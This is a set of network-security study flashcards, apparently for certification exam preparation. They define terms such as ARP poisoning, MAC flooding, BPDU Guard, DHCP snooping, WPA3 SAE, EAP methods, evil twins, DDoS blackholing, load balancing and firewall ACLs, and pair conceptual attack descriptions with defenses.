§  IMPLICATIONS OF IPV6 

Definition

§  IPv6 has impacts for on-premises networks, for the way your company accesses cloud services, and for the way clients access web servers and other public servers that you publish.

§  IPv6 may be enabled by default on clients and servers, and even on network appliances (routers and firewalls), so there must be a management and security plan for it. If IPv6 is enabled but unmanaged, there is the potential for malicious use as a backdoor or covert channel. IPv6 also exposes novel attack vectors, such as spoofing and DoS attacks on neighbor discovery.

 

§  Hosts should be allocated IPv6 addresses that map to the same zones as the IPv4 topology. Firewalls should be configured with ACLs that either achieve the same security configuration as for IPv4 or block IPv6, if that is a better option. One issue here is that IPv6 is not intended to perform any type of address translation. Rather than obscure internal/external traffic flows with private to public address mapping, IPv6 routing and filtering policies should be configured to mirror the equivalent IPv4 architecture.

Term
east-west traffic 
Definition
 In data centers that support cloud and other Internet services, most traffic is actually between servers within the data center. This is referred to as east-west traffic.
Term
Zero trust  
Definition

Zero trust architectures assume that nothing should be taken for granted and that all network access must be continuously verified and authorized. Any user, device, or application seeking access must be authenticated and verified. Zero Trust differs from traditional security models based on simply granting access to all users, devices, and applications contained within an organization's trusted network.

A Zero Trust architecture can protect data, applications, networks, and systems from malicious attacks and unauthorized access more effectively than a traditional architecture by ensuring that only necessary services are allowed and only from appropriate sources. Zero Trust enables organizations to offer services based on varying levels of trust, such as providing more limited access to sensitive data and systems.

Term

Man-in-the-Middle/On-Path Attacks 

Definition

Attackers can also take advantage of the lack of security in low-level data link protocols to perform man-in-the-middle (MitM) attacks. A MitM or on-path attack is where the threat actor gains a position between two hosts, and transparently captures, monitors, and relays all communication between the hosts. An on-path attack could also be used to covertly modify the traffic. For example, a MitM host could present a workstation with a spoofed website form, to try to capture the user credential. Another common on-path attack spoofs responses to DNS queries, redirecting users to spoofed websites. On-path attacks can be defeated using mutual authentication, where both hosts exchange secure credentials, but at layer 2 it is not always possible to put these controls in place.

Term

MAC cloning

An attack in which an attacker falsifies the factory-assigned MAC address of a device's network interface. 

 

Definition

MAC cloning, or MAC address spoofing, changes the hardware address configured on an adapter interface or asserts the use of an arbitrary MAC address. While a unique MAC address is assigned to each network interface by the vendor at the factory, it is simple to override it in software via OS commands, alterations to the network driver configuration, or using packet crafting software. This can lead to a variety of issues when investigating security incidents or when depending on MAC addresses as part of a security control, as the presented address of the device may not be reliable.

Term

Address Resolution Protocol (ARP) 


The broadcast mechanism by which individual hardware MAC addresses are matched to an IP address on a local network segment.

 

 

Definition

An ARP poisoning attack uses a packet crafter, such as Ettercap, to broadcast unsolicited ARP reply packets. Because ARP has no security mechanism, the receiving devices trust this communication and update their MAC:IP address cache table with the spoofed address. 

Term

MAC Flooding Attacks 

Definition
Where ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. The intention of the attacker is to exhaust the memory used to store the switch's MAC address table. The switch uses the MAC address table to determine which port to use to forward unicast traffic to its correct destination. Overwhelming the table can cause the switch to stop trying to apply MAC-based forwarding and flood unicast traffic out of all ports, working as a hub. This makes sniffing network traffic easier for the threat actor. 
Term

LOOP PREVENTION

[image]

Definition

An Ethernet switch's layer 2 forwarding function is similar to that of an older network appliance called a bridge. In a network with multiple bridges, implemented these days as switches, there may be more than one path for a frame to take to its intended destination. As a layer 2 protocol, Ethernet has no concept of Time To Live. Therefore, layer 2 broadcast traffic could continue to loop through a network with multiple paths indefinitely. Layer 2 loops are prevented by the Spanning Tree Protocol (STP). Spanning tree is a means for the bridges to organize themselves into a hierarchy and prevent loops from forming.

This diagram shows the minimum configuration necessary to prevent loops in a network with three bridges or switches. The root bridge has two designated ports (DP) connected to Bridge A and Bridge B. Bridges A and B both have root ports (RP) connected back to the interfaces on the root bridge. Bridges A and B also have a connection directly to one another. On Bridge A, this interface is active and traffic for Bridge B can be forwarded directly over it. On Bridge B, the interface is blocked (BP) to prevent a loop and traffic for Bridge A must be forwarded via the root bridge. Only Bridge Protocol Data Unit (BPDU) traffic will go across a blocked port.

Term

Broadcast Storm Prevention 

Definition
Traffic that is recirculated and amplified by loops in a switching topology, causing network slowdowns and crashing switches.
Term

Broadcast Storm Prevention  

Definition

STP is principally designed to prevent broadcast storms. Switches forward broadcast, multicast, and unknown unicast traffic out of all ports. If a bridged network contains a loop, broadcast traffic will travel through the network, get amplified by the other switches, and arrive back at the original switch, which will re-broadcast each incoming broadcast frame, causing an exponential increase (the storm), which will rapidly overwhelm the switches and crash the network.


A loop can be created accidentally or maliciously by plugging a patch cable from one patch panel port to another or connecting two wall ports. Normally, STP should detect the loop and block a port to break or eliminate the loop, resulting in a few seconds of disruption. However, STP may be misconfigured, or a threat actor may have managed to disrupt it. A storm control setting on a switch is a backup mechanism to rate-limit broadcast traffic above a certain threshold.

Term

Bridge Protocol Data Unit (BPDU) Guard 

Definition

BPDU Guard is a switch port security feature that can disable a port if it receives a BPDU from a connected device. This is configured on access ports where there any BPDU frames are likely to be malicious.

 

Term

Bridge Protocol Data Unit (BPDU) Guard

Definition

A threat actor might try to attack STP using a rogue switch or software designed to imitate a switch. When a switch does not know the correct port to use for a particular destination MAC address (if the cache has just been flushed, for instance), it floods the unknown unicast frame out to all ports. Topology changes in STP can cause a switch to flush the cache more frequently and to start flooding unicast traffic more frequently, which can have a serious impact on network performance and assists sniffing attacks.

The configuration of switch ports should prevent the use of STP over ports designated for client devices (access ports). An access port is configured with the portfast command to prevent STP changes from delaying client devices trying to connect to the port. Additionally, the BPDU Guard setting should be applied. This causes a portfast-configured port that receives a BPDU to become disabled  Bridge Protocol Data Units (BPDUs) are used to communicate information about the topology and are not expected on access ports, so BPDU Guard protects against misconfiguration or a possible malicious attack.

Term
port security 
Definition

Preventing a device attached to a switch port from communicating on the network unless it matches a given MAC address or other protection profile.

 

Term

MAC Filtering 

Definition

Applying an access control list to a switch or access point so that only clients with approved MAC addresses can connect to it.

 

Term

MAC Filtering and MAC Limiting 

Definition
Configuring MAC filtering on a switch means defining which MAC addresses are allowed to connect to a particular port. This can be done by creating a list of valid MAC addresses or by specifying a limit to the number of permitted addresses. For example, if port security is enabled with a maximum of two MAC addresses, the switch will record the first two MACs to connect to that port, but then drop any traffic from machines with different MAC addresses that try to connect  This provides a guard against MAC flooding attacks.
Term
Dynamic Host Configuration Protocol (DHCP) snooping
Definition
A configuration option that enables a switch to inspect DHCP traffic to prevent MAC spoofing.
Term

DHCP Snooping 

Definition
Another option is to configure Dynamic Host Configuration Protocol (DHCP) snooping. DHCP is the protocol that allows a server to assign IP address information to a client when it connects to the network. DHCP snooping inspects this traffic arriving on access ports to ensure that a host is not trying to spoof its MAC address. It can also be used to prevent rogue (or spurious) DHCP servers from operating on the network. With DHCP snooping, only DHCP messages from ports configured as trusted are allowed. Additionally dynamic ARP inspection (DAI), which can be configured alongside DHCP snooping, prevents a host attached to an untrusted port from flooding the segment with gratuitous ARP replies. DAI maintains a trusted database of IP:ARP mappings and ensures that ARP packets are validly constructed and use valid IP addresses
Term
 port-based network access (PNAC)
Definition

A switch (or router) that performs some sort of authentication of the attached device before activating the port.


The IEEE 802.1X standard defines a port-based network access control (PNAC) mechanism. PNAC means that the switch uses an Authentication, Authorization, and Accounting (AAA) server to authenticate the attached device before activating the port. 

Term
Network access control (NAC) 
Definition

A general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level.

Network access control (NAC) products can extend the scope of authentication to allow administrators to devise policies or profiles describing a minimum security configuration that devices must meet to be granted network access. This is called a health policy. Typical policies check things such as malware infection, firmware and OS patch level, personal firewall status, and the presence of up-to-date virus definitions. A solution may also be able to scan the registry or perform file signature verification. The health policy is defined on a NAC management server along with reporting and configuration tools.

 

Term
Posture assessment  
Definition

The process for verifying compliance with a health policy by using host health checks.

 

Posture assessment is the process by which host health checks are performed against a client device to verify compliance with the health policy. Most NAC solutions use client software called an agent to gather information about the device, such as its antivirus and patch status, presence of prohibited applications, or anything else defined by the health policy.

 

An agent can be persistent, in which case it is installed as a software application on the client, or nonpersistent. A nonpersistent (or dissolvable) agent is loaded into memory during posture assessment but is not installed on the device.

Term

ROUTE SECURITY 

Definition

A successful attack against route security enables the attacker to redirect traffic from its intended destination. On the Internet, this may allow the threat actor to herd users to spoofed websites. On an enterprise network, it may facilitate circumventing firewalls and security zones to allow lateral movement and data exfiltration.

Routes between networks and subnets can be configured manually, but most routers automatically discover routes by communicating with each other. Dynamic routers exchange information about routes using routing protocols. It is important that this traffic be separated from channels used for other types of data. Routing protocols do not always have effective integral security mechanisms, so they need to run in an environment where access is very tightly controlled.

Routing is subject to numerous vulnerabilities, including:

§  Spoofed routing information (route injection)—Routing protocols that have no or weak authentication are vulnerable to route table poisoning. This can mean that traffic is misdirected to a monitoring port (sniffing), sent to a blackhole (nonexistent address), or continuously looped around the network, causing DoS. Most dynamic routing protocols support message authentication via a shared secret configured on each device. This can be difficult to administer, however. It is usually also possible to configure how a router identifies the peers from which it will accept route updates. This makes it harder to simply add a rogue router to the system. An attacker would have to compromise an existing router and change its configuration.

§  Source routing—This uses an option in the IP header to pre-determine the route a packet will take through the network (strict) or "waypoints" that it must pass through (loose). This can be used maliciously to spoof IP addresses and bypass router/firewall filters. Routers can be configured to block source routed packets.

§  Software exploits in the underlying operating system—Hardware routers (and switches) have an embedded operating system. For example, Cisco devices typically use the Internetwork Operating System (IOS). Something like IOS suffers from fewer exploitable vulnerabilities than full network operating systems. It has a reduced attack surface compared to a computer OS, such as Windows. 

On the other hand, SOHO broadband routers can be particularly vulnerable to unpatched exploits.

Term
 access points 
Definition

A device that provides a connection between wireless devices and can connect to wired networks.

 

Term
service set identifier (SSID)
Definition

A character string that identifies a particular wireless LAN (WLAN).

 

Term

 

 Wireless Access Point (WAP) Placement

Definition

An infrastructure-based wireless network comprises one or more wireless access points, each connected to a wired network. The access points forward traffic to and from the wired switched network. Each WAP is identified by its MAC address, also referred to as its basic service set identifier (BSSID). Each wireless network is identified by its name, or service set identifier (SSID).

Wireless networks can operate in either the 2.4 GHz or 5 GHz radio band. Each radio band is divided into a number of channels, and each WAP must be configured to use a specific channel. For performance reasons, the channels chosen should be as widely spaced as possible to reduce different types of interference:

§  Co-channel interference (CCI)—when two WAPs in close proximity use the same channel, they compete for bandwidth within that channel, and signals have to be re-transmitted as they collide.

 

§  Adjacent channel interference (ACI)—channels have only ~5 MHz spacing, but Wi-Fi requires 20 MHz of channel space. When the channels selected for WAPs are not cleanly spaced, the interference pattern creates significant numbers of errors and loss of bandwidth. For example, if two access points within range of one another are configured in the 2.4 GHz band with channels 1 and 6, they will not overlap. If a third access point is added using channel 3, it will use part of the spectrum used by both the other WAPs, and all three networks will suffer from interference.

Term
site survey 
Definition

site survey is used to measure signal strength and channel usage throughout the area to cover. A site survey starts with an architectural map of the site, with physical features that can cause background interference marked. These features include solid walls, reflective surfaces, motors, microwave ovens, and so on. The survey is performed with a Wi-Fi-enabled laptop or mobile device with Wi-Fi analyzer software installed. The Wi-Fi analyzer records information about the signal obtained at regularly spaced points as the surveyor moves around the area.

Term
heat map 
Definition

These readings are combined and analyzed to produce a heat map, showing where a signal is strong (red) or weak (green/blue), and which channel is being used and how they overlap. This data is then used to optimize the design, by adjusting transmit power to reduce a WAP's range, changing the channel on a WAP, adding a new WAP, or physically moving a WAP to a new location.

Term
wireless controllers 
Definition

Rather than configure each device individually, enterprise wireless solutions implement wireless controllers for centralized management and monitoring. A controller can be a hardware appliance or a software application run on a server. 


An access point whose firmware contains enough processing logic to be able to function autonomously and handle clients without the use of a wireless controller is known as a fat WAP, while one that requires a wireless controller in order to function is known as a thin WAP.

Controllers and access points must be made physically secure, as tampering could allow a threat actor to insert a rogue/evil twin WAP to try to intercept logons. These devices must be managed like switches and routers, using secure management interfaces and strong administrative credentials.

 

 

Term
   WiFi Protected Access 2 (WPA2) 
Definition
WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys, deployed within the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). AES replaces RC4 and CCMP replaces TKIP. CCMP provides authenticated encryption, which is designed to make replay attacks harder.
Term
WiFi Protected Access 3 (WPA3)
Definition

§  Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on Diffie-Hellman key agreement.

§  Enhanced Open—enables encryption for the open authentication method.

§  Updated cryptographic protocols—replaces AES CCMP with the AES Galois Counter Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.

 

§  Management protection frames—mandates use of these to protect against key recovery attacks.

Term

WPA2 Pre-Shared Key Authentication 

Definition

In WPA2, pre-shared key (PSK) authentication uses a passphrase to generate the key that is used to encrypt communications. It is also referred to as group authentication because a group of users share the same secret. When the access point is set to WPA2-PSK mode, the administrator configures a passphrase of between 8 and 63 ASCII characters. This is converted to a 256-bit HMAC (expressed as a 64-character hex value) using the PBKDF2 key stretching algorithm. This HMAC is referred to as the pairwise master key (PMK). The same secret must be configured on the access point and on each node that joins the network. The PMK is used as part of WPA2's 4-way handshake to derive various session keys.

Term

WPA3 Personal Authentication

Definition

While WPA3 still uses a passphrase to authenticate stations in personal mode, it changes the method by which this secret is used to agree upon session keys. The scheme used is also referred to as Password Authenticated Key Exchange (PAKE). In WPA3, the Simultaneous Authentication of Equals (SAE) protocol replaces the 4-way handshake, which has been found to be vulnerable to various attacks. SAE uses the Dragonfly handshake, which is basically Diffie-Hellman over elliptic curves key agreement, combined with a hash value derived from the password and device MAC address to authenticate the nodes. With SAE, there should be no way for an attacker to sniff the handshake to obtain the hash value and try to use an offline brute-force or dictionary attack to recover the password. Dragonfly also implements ephemeral session keys, providing forward secrecy.

Term

WI-FI PROTECTED SETUP 

Definition

As setting up an access point securely is relatively complex for residential consumers, vendors have developed a system to automate the process called Wi-Fi Protected Setup (WPS). To use WPS, both the access point and wireless station (client device) must be WPS-capable. Typically, the devices will have a pushbutton. Activating this on the access point and the adapter simultaneously will associate the devices using a PIN, then associate the adapter with the access point using WPA2. The system generates a random SSID and PSK. If the devices do not support the push button method, the PIN (printed on the WAP) can be entered manually.

 

Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight characters, one digit is a checksum and the rest are verified as two separate PINs of four and three characters. These separate PINs are many orders of magnitude simpler to brute force, typically requiring just hours to crack. On some models, disabling WPS through the admin interface does not actually disable the protocol, or there is no option to disable it. Some APs can lock out an intruder if a brute force attack is detected, but in some cases the attack can just be resumed when the lockout period expires. To counter this, the lockout period can be increased. However, this can leave APs vulnerable to a denial of service (DoS) attack. When provisioning a WAP, it is essential to verify what steps the vendor has taken to make their WPS implementation secure and the firmware level required to assure security.

Term

captive portal

A web page or website to which a client is redirected before being granted full network access. 

 

Definition

Selecting open authentication means that the client is not required to authenticate. This mode would be used on a public WAP (or "hotspot"). In WPA2, this also means that data sent over the link is unencrypted. Open authentication may be combined with a secondary authentication mechanism managed via a browser. When the client associates with the open hotspot and launches the browser, the client is redirected to a captive portal or splash page. This will allow the client to authenticate to the hotspot provider's network (over HTTPS, so the login is secure). The portal may also be designed to enforce terms and conditions and/or take payment to access the Wi-Fi service.


When using open wireless, users must ensure they send confidential web data only over HTTPS connections and only use email, VoIP, IM, and file transfer services with SSL/TLS enabled. Another option is for the user to join a Virtual Private Network (VPN). The user would associate with the open hotspot then start the VPN connection. This creates an encrypted "tunnel" between the user's computer and the VPN server. This allows the user to browse the web or connect to email services without anyone eavesdropping on the open Wi-Fi network being able to intercept those communications. The VPN could be provided by the user's company or they could use a third-party VPN service provider. Of course, if using a third party, the user needs to be able to trust them implicitly. The VPN must use certificate-based tunneling to set up the "inner" authentication method.

 

WPA3 can implement a mode called Wi-Fi Enhanced Open, which uses opportunistic wireless encryption (OWE). OWE uses the Dragonfly handshake to agree with ephemeral session keys on joining the network. This means that one station cannot sniff the traffic from another station, because they are using different session keys. There is still no authentication of the access point, however.

Term
IEEE 802.1X AUTHENTICATION 
Definition

As an alternative to personal authentication, the enterprise authentication method implements IEEE 802.1X to use an Extensible Authentication Protocol (EAP) mechanism. 802.1X defines the use of EAP over Wireless (EAPoW) to allow an access point to forward authentication data without allowing any other type of network access. It is configured by selecting WPA2-Enterprise or WPA3-Enterprise as the security method on the access point.

 

With enterprise authentication, when a wireless station requests an association, the WAP enables the channel for EAPoW traffic only. It passes the credentials of the user (supplicant) to an AAA (RADIUS or TACACS+) server on the wired network for validation. When the supplicant has been authenticated, the AAA server transmits a master key (MK) to the supplicant. The supplicant and authentication server then derive the same pairwise master key (PMK) from the MK. The AAA server transmits the PMK to the access point. The wireless station and access point use the PMK to derive session keys, using either the WPA2 4-way handshake or WPA3 SAE methods.

Term
Extensible Authentication Protocol (EAP) 
Definition

The Extensible Authentication Protocol (EAP) defines a framework for negotiating authentication mechanisms rather than the details of the mechanisms themselves. Vendors can write extensions to the protocol to support third-party security devices. EAP implementations can include smart cards, one-time passwords, biometric identifiers, or simpler username and password combinations. 

Term
EAP-TLS  
Definition

EAP-TLS is one of the strongest types of authentication and is very widely supported. An encrypted Transport Layer Security (TLS) tunnel is established between the supplicant and authentication server using public key certificates on the authentication server and supplicant. As both supplicant and server are configured with certificates, this provides mutual authentication. The supplicant will typically provide a certificate using a smart card or a certificate could be installed on the client device, possibly in a Trusted Platform Module (TPM).

Term

 Protected Extensible Authentication Protocol (PEAP)

×

 

EAP implementation that uses a server-side certificate to create a secure tunnel for user authentication, referred to as the inner method.

 

Definition
In Protected Extensible Authentication Protocol (PEAP), as with EAP-TLS, an encrypted tunnel is established between the supplicant and authentication server, but PEAP only requires a server-side public key certificate. The supplicant does not require a certificate. With the server authenticated to the supplicant, user authentication can then take place through the secure tunnel with protection against sniffing, password-guessing/dictionary, and on-path attacks. The user authentication method (also referred to as the "innermethod) can use either EAP-MS-CHAPv2 or EAP-GTC. The Generic Token Card (GTC) method transfers a token for authentication against a network directory or using a one-time password mechanism.
Term

EAP-Tunneled TLS (EAP-TTLS) 

An EAP method that enables a client and server to establish a secure connection without mandating a client-side certificate.

 

 

Definition

EAP-Tunneled TLS (EAP-TTLS) is similar to PEAP. It uses a server-side certificate to establish a protected tunnel through which the user's authentication credentials can be transmitted to the authentication server. The main distinction from PEAP is that EAP-TTLS can use any inner authentication protocol (PAP or CHAP, for instance), while PEAP must use EAP-MS-CHAPv2 or EAP-GTC. 

Term

EAP with Flexible Authentication via Secure Tunneling (EAP-FAST)
An EAP method developed by Cisco as a replacement for LEAP. EAP-FAST does not require a certificate authority while aiming to provide a higher level of security.

 

Definition

PEAP, but instead of using a certificate to set up the tunnel, it uses a Protected Access Credential (PAC), which is generated for each user from the authentication server's master key. The problem with EAP-FAST is in distributing (provisioning) the PAC securely to each user requiring access. The PAC can either be distributed via an out-of-band method or via a server with a digital certificate (but in the latter case, EAP-FAST does not offer much advantage over using PEAP). Alternatively, the PAC can be delivered via anonymous Diffie-Hellman key exchange. The problem here is that there is nothing to authenticate the access point to the user. A rogue access point could obtain enough of the user credential to perform an ASLEAP password cracking attack.

Term

RADIUS FEDERATION 

Definition

Most implementations of EAP use a RADIUS server to validate the authentication credentials for each user (supplicant). RADIUS federation means that multiple organizations allow access to one another's users by joining their RADIUS servers into a RADIUS hierarchy or mesh. For example, when Bob from widget.foo needs to log on to grommet.foo's network, the RADIUS server at grommet.foo recognizes that Bob is not a local user but has been granted access rights and routes the request to widget.foo's RADIUS server.

One example of RADIUS federation is the eduroam network (eduroam.org), which allows students of universities from several different countries to log on to the networks of any of the participating institutions using the credentials stored by their "home" university.

Term
ROGUE ACCESS POINTS 
Definition

A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not.

A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities, and a non-malicious user could enable such an access point by accident. If connected to a LAN without security, an unauthorized WAP creates a backdoor through which to attack the network. A rogue WAP could also be used to capture user logon attempts, allow man-in-the-middle attacks, and allow access to private information.

Term
EVIL TWINS 
Definition

A wireless access point that deceives users into believing that it is a legitimate network access point.An evil twin might just have a similar name (SSID) to the legitimate one, or the attacker might use some DoS technique to overcome the legitimate WAP. The evil twin might be able to harvest authentication information from users entering their credentials by mistake. 


 

Term

DISASSOCIATION
A disassociation frame is sent in order to terminate the association from either side in an access point.

 

Definition

A disassociation attack exploits the lack of encryption in management frame traffic to send spoofed frames. One type of disassociation attack injects management frames that spoof the MAC address of a single victim station in a disassociation notification, causing it to be disconnected from the network. Another variant of the attack broadcasts spoofed frames to disconnect all stations. Frames can be spoofed to send either disassociation or deauthentication notifications.

Term
 deauthentication 
Definition

A deauthentication frame is used to completely end a connection with a Wi-Fi network.

 

Term
REPLAY ATTACKS 
Definition

. Disassociation/deauthentication attacks might also be used in conjunction with a replay attack aimed at recovering the network key. The attacks can be mitigated if the wireless infrastructure supports Management Frame Protection (MFP/802.11w). Both the WAP and clients must be configured to support MFP. Pre-shared key authentication is vulnerable to various types of replay attack that aim to capture the hash of the passphrase when a wireless station associates with an access point.

Term

JAMMING ATTACKS 

Definition

. A Wi-Fi jamming attack can be performed by setting up a WAP with a stronger signal. Wi-Fi jamming devices are also widely available, though they are often illegal to use and sometimes to sell. Such devices can be very small, but the attacker still needs to gain fairly close physical proximity to the wireless network.The only ways to defeat a jamming attack are either to locate the offending radio source and disable it, or to boost the signal from the legitimate equipment.

Term

 denial of service (DoS)  

 

Definition
Any type of physical, application, or network attack that affects the availability of a managed resource.
Term
distributed DoS (DDoS) 
Definition

An attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic.Typically, a threat actor will compromise machines to use as handlers in a command and control network. The handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools (bots) forming a botnet.  DDoS aims to deny service, not gain access. The purpose of a DDoS is to overload the target so it’s unavailable to legitimate users

 

Term

Application Attacks 

Definition
 an application attack targets vulnerabilities in the headers and payloads of specific application protocols. For example, one type of amplification attack targets DNS services with bogus queries. One of the advantages of this technique is that while the request is small, the response to a DNS query can be made to include a lot of information, so this is a very effective way of overwhelming the bandwidth of the victim network with much more limited resources on the attacker's botnet.
Term
operational technology (OT) 
Definition

A communications network designed to implement an industrial control system rather than data networking.

 

Term
remotely triggered blackhole (RTBH) 
Definition
A standard method of doing this with border gateway protocol (BGP) routing is called a remotely triggered blackhole (RTBH)  The blackhole also makes the attack less damaging to the ISP's other customers. With both approaches, legitimate traffic is discarded along with the DDoS packets.A blackhole drops packets for the affected IP addresses(es). A blackhole is an area of the network that cannot reach any other part of the network which protects the unaffected portion.

Term
DNS sinkhole
Definition

A DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis.

 

Another option is to use sinkhole routing so that the traffic flooding a particular IP address is routed to a different network where it can be analyzed. Potentially some legitimate traffic could be allowed through, but the real advantage is to identify the source of the attack and devise rules to filter it. The target can then use low TTL DNS records to change the IP address advertised for the service and try to allow legitimate traffic past the flood.

There are cloud DDoS mitigation services that can act as sinkhole network providers and try to "scrub" flooded traffic.

Term

 load balancer

A type of switch or router that distributes client requests between different resources, such as communications links or similarly-configured servers. This provides fault tolerance and improves throughput.

 

Definition

load balancer distributes client requests across available server nodes in a farm or pool. This is used to provision services that can scale from light to heavy loads, and to provide mitigation against DDoS attacks. A load balancer also provides fault tolerance. If there are multiple servers available in a farm, all addressed by a single name/IP address via a load balancer, then if a single server fails, client requests can be routed to another server in the farm. You can use a load balancer in any situation where you have multiple servers providing the same function. Examples include web servers, front-end email servers, and web conferencing, A/V conferencing, or streaming media servers.

Term

There are two main types of load balancers: 

Definition

§  Layer 4 load balancerbasic load balancers make forwarding decisions on IP address and TCP/UDP port values, working at the transport layer of the OSI model.

§  Layer 7 load balancer (content switch)—as web applications have become more complex, modern load balancers need to be able to make forwarding decisions based on application-level data, such as a request for a particular URL or data types like video or audio streaming. This requires more complex logic, but the processing power of modern appliances is sufficient to deal with this. 

 

Term
Virtual Server/Load Balancer 
Definition

The website (or other service) is published to DNS using its public IP address. This is referred to as a virtual server. 

The machine operating as the virtual server is not a web server but a load balancing router. It accepts connections from Internet clients on the public address. The load balancer may use a firewall to drop any traffic that does not match its policy. 

Term

Scheduling 

Definition

The scheduling algorithm is the code and metrics that determine which node is selected for processing each incoming request. The simplest type of scheduling is called round robin; this just means picking the next node. Other methods include picking the node with the fewest connections or the best response time. Each method can also be weighted, using administrator set preferences or dynamic load information or both.

 

The load balancer must also use some type of heartbeat or health check probe to verify whether each node is available and under load or not. Layer 4 load balancers can only make basic connectivity tests while layer 7 appliances can test the application's state, as opposed to only verifying host availability.

Term

Source IP or session affinity 

A scheduling approach used by load balancers to route traffic to devices that have already established connections with the client in question.

 

 

Definition
Source IP or session affinity is a layer 4 approach to handling user sessions. It means that when a client establishes a session, it becomes stuck to the node that first accepted the request.
Term

persistence  

In load balancing, the configuration option that enables a client to maintain a connection with a load-balanced server over the duration of the session. Also referred to as sticky sessions.

 

 

Definition
An application-layer load balancer can use persistence to keep a client connected to a session. Persistence typically works by setting a cookie, either on the node or injected by the load balancer. This can be more reliable than source IP affinity, but requires the browser to accept the cookie.
Term

clustering 

A load balancing technique where a group of servers are configured as a unit and work together to provide network services.

 

Definition

clustering allows multiple redundant processing nodes that share data with one another to accept connections. This provides redundancy. If one of the nodes in the cluster stops working, connections can failover to a working node. To clients, the cluster appears to be a single server.

Term

Virtual IP  

Definition
For example, you might want to provision two load balancer appliances so that if one fails, the other can still handle client connections. Unlike load balancing with a single appliance, the public IP used to access the service is shared between the two instances in the cluster. This is referred to as a virtual IP or shared or floating address. The instances are configured with a private connection, on which each is identified by its "real" IP address. This connection runs some type of redundancy protocol, such as Common Address Redundancy Protocol (CARP), that enables the active node to "own" the virtual IP and respond to connections. The redundancy protocol also implements a heartbeat mechanism to allow failover to the passive node if the active one should suffer a fault.
Term
active/passive clustering
Definition

For example, you might want to provision two load balancer appliances so that if one fails, the other can still handle client connections.
 
if one node is active, the other is passive. The major advantage of active/passive configurations is that performance is not adversely affected during failover. However, the hardware and operating system costs are higher because of the unused capacity.

In active/passive clustering, if the active node suffers a fault, the connection can failover to the passive node, without performance degradation.

 

Term
active/active cluster
Definition
An active/active cluster means that both nodes are processing connections concurrently. This allows the administrator to use the maximum capacity from the available hardware while all nodes are functional. In the event of a failover the workload of the failed node is immediately and transparently shifted onto the remaining node. At this time, the workload on the remaining nodes is higher and performance is degraded.
Term

Application Clustering

Definition

Clustering is also very commonly used to provision fault tolerant application services. If an application server suffers a fault in the middle of a session, the session state data will be lost. Application clustering allows servers in the cluster to communicate session information to one another. For example, if a user logs in on one instance, the next session can start on another instance, and the new server can access the cookies or other information used to establish the login.

Term

Quality of Service (QoS)

Systems that differentiate data passing over the network that can reserve bandwidth for particular applications. A system that cannot guarantee a level of available bandwidth is often described as Class of Service (CoS).

 

Definition
Most network appliances process packets on a best effort and first in, first out (FIFO) basis. Quality of Service (QoS) is a framework for prioritizing traffic based on its characteristics. It is primarily used to support voice and video applications that require a minimum level of bandwidth and are sensitive to latency and jitter. Latency is the time it takes for a transmission to reach the recipient, measured in milliseconds (ms). Jitter is defined as being a variation in the delay, or an inconsistent rate of packet delivery. FIFO-based delivery makes it more likely that other applications sharing the same network will cause loss of bandwidth and increase latency and jitter for a real-time service.
Term
Content Addressable Memory (CAM)
Definition

 

Content Addressable Memory (CAM) table is a system memory construct used by Ethernet switch logic which stores information such as MAC addresses available on physical ports with their associated VLAN Parameters. The CAM table, or content addressable memory table, is present in all switches for layer 2 switching.
Term

Access Control Lists (ACLs) 

 

Firewall access control lists (ACLs) are configured on the principle of least access/least privilege.

 

 

Definition

packet filtering firewall is configured by specifying a group of rules, called an access control list (ACL). Each rule defines a specific type of data packet and the action to take when a packet matches the rule. A packet filtering firewall can inspect the headers of IP packets. This means that rules can be based on the information found in those headers:

§  IP filteringaccepting or denying traffic on the basis of its source and/or destination IP address. Some firewalls might also be able to filter by MAC addresses.

§  Protocol ID/type (TCP, UDP, ICMP, routing protocols, and so on).

§  Port filtering/security—accepting or denying a packet on the basis of source and destination port numbers (TCP or UDP application type).

 

If the action is configured to accept or permit, the firewall allows the packet to pass. A drop or deny action silently discards the packet. A reject action also blocks the packet, but responds to the sender with an ICMP message, such as port unreachable. Another distinction that can be made is whether the firewall can control only inbound traffic or both inbound and outbound traffic. This is also often referred to as ingress and egress traffic or filtering. Controlling outbound traffic is useful because it can block applications that have not been authorized to run on the network and defeat malware, such as backdoors. Ingress and egress traffic is filtered using separate ACLs. 

Term

Stateless Operation 
Packet Filtering Firewall

Definition

A basic packet filtering firewall is stateless. This means that it does not preserve information about network sessions. Each packet is analyzed independently, with no record of previously processed packets. This type of filtering requires the least processing effort, but it can be vulnerable to attacks that are spread over a sequence of packets. A stateless firewall can also introduce problems in traffic flow, especially when some sort of load balancing is being used or when clients or servers need to use dynamically assigned ports. 

Term
STATEFUL INSPECTION 
Definition

stateful inspection firewall addresses problems by tracking information about the session established between two hosts, or blocking malicious attempts to start a bogus session. The vast majority of firewalls now incorporate some level of stateful inspection capability. Session data is stored in a state table. When a packet arrives, the firewall checks it to confirm whether it belongs to an existing connection. If it does not, it applies the ordinary packet filtering rules to determine whether to allow it. Once the connection has been allowed, the firewall usually allows traffic to pass unmonitored, in order to conserve processing effort.

Term
IPTABLES 
Definition

iptables is a command line utility provided by many Linux distributions that allows administrators to edit the rules enforced by the Linux kernel firewall

Term

appliance firewall
An appliance firewall is a stand-alone hardware firewall deployed to monitor traffic passing into and out of a network zone. An appliance firewall is a stand-alone hardware firewall that monitors all traffic passing into and out of a network segment..

A firewall appliance can be deployed in two ways:

Definition
  • Routed (layer 3)—the firewall performs forwarding between subnets. Each interface on the firewall connects to a different subnet and represents a different security zone.
